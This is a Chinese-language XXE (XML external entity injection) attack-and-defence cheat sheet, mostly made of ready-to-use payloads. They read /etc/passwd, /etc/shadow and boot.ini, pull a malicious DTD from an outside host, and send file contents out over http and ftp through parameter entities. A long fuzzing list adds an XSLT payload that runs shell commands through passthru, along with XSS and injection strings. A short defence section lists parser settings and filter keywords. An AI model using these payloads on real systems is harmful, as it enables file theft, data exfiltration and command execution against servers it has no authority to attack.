应用安全-XXE(XML外部实体注入)攻防整理
libxml2.9.1及以后,默认不解析外部实体。测试的时候window下使用php5.2(libxml Version 2.7.7 ), php5.3(libxml Version 2.7.8)。Linux中需要将libxml低于libxml2.9.1的版本编译到PHP中,可使用phpinfo()查看libxml的版本信息
外部实体注入 - 通过DTD外部实体声明
payload-1
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY b SYSTEM "file://etc/passwd">]> <c>&b;</c>
payload-2
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<user>
<firstname>&xxe;</firstname>
<lastname>melody</lastname>
</user>
外部实体注入 - 通过DTD文档引入外部DTD文档,再引入外部实体声明
<?xml version="1.0"?> <!DOCTYPE a SYSTEM "http://mark4z5.com/evil.dtd"> <c>&b;</c> DTD内容: <!ENTITY b SYSTEM "file:///etc/passwd">
外部实体注入 - 通过DTD引入外部实体声明
<?xml version="1.0"> <!DOCTYPE a [ <!ENTITY % d SYSTEM "http://mark4z5.com/evil.dtd"> %d; ]> <c>&b;</c> DTD内容: <!ENTITY b SYSTEM "file///etc/passwd">
XMLDTD部分支持协议
libxml2 file http ftp PHP file http ftp php compress.zlib compress.bzip2 data glob phar 扩展支持部分: https/ftps openssl zip zip ssh2.shell/ssh2.exec/ssh2.tunnel/ssh2.sftp/ssh2.scp ssh2 rar rar ogg oggvorbis expect expect Java http https ftp file jar netdoc mailto gopher * .NET file http https ftp
工具 - burp - Collaborator
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE copyright [ <!ENTITY test SYSTEM "http://collaborator生成的随机值"> ]>
XML语句
XML Schema 实体的攻击 - schemaLocation
XML Schema 实体的攻击 - schemaLocation
XML Schema 实体的攻击 - noNamespaceSchemaLocation
XML Schema 实体的攻击 - XInclude。
XML Schema 实体的攻击 - XSLT 攻击
XXE - 读取任意文件
XXE - 执行系统命令
XXE - 探测内网端口
XXE - 攻击内网网站
XXE - DDOS攻击
防御 - 禁用外部实体
PHP: libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false); Python: from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
防御 - 过滤用户提交的XML数据
关键字:<!DOCTYPE、<!ENTITY、SYSTEM、PUBLIC
Fuzzing
1 <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" > 2 <?xml version="1.0" encoding="ISO-8859-1"?> 3 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 4 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 5 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 6 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 7 <?xml version="1.0" encoding="ISO-8859-1"?><test></test> 8 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> 9 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 10 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo> 11 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]> 12 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> 13 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 14 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> 15 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 16 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo> 17 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]> 18 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo> 19 <test></test> 20 <![CDATA[<test></test>]]> 21 &foo; 22 %foo; 23 count(/child::node()) 24 x' or name()='username' or 'x'='y 25 <name>','')); phpinfo(); exit;/*</name> 26 <![CDATA[<script>var n=0;while(true){n++;}</script>]]> 27 <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> 28 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 29 <foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 30 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo> 31 <foo><![CDATA[' or 1=1 or ''=']]></foo> 32 <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> 33 <xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 34 <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 35 <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 36 <xml SRC="xsstest.xml" ID=I></xml> 37 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> 38 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> 39 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet> 40 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet> 41 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet> 42 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 43 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 44 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 45 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]> 46 <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]> 47 <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://127.0.0.1:80/?%file;'> "> %int; 48 <!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>"> 49 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 50 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 51 <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
检测工具
XXEinjector - 基于Ruby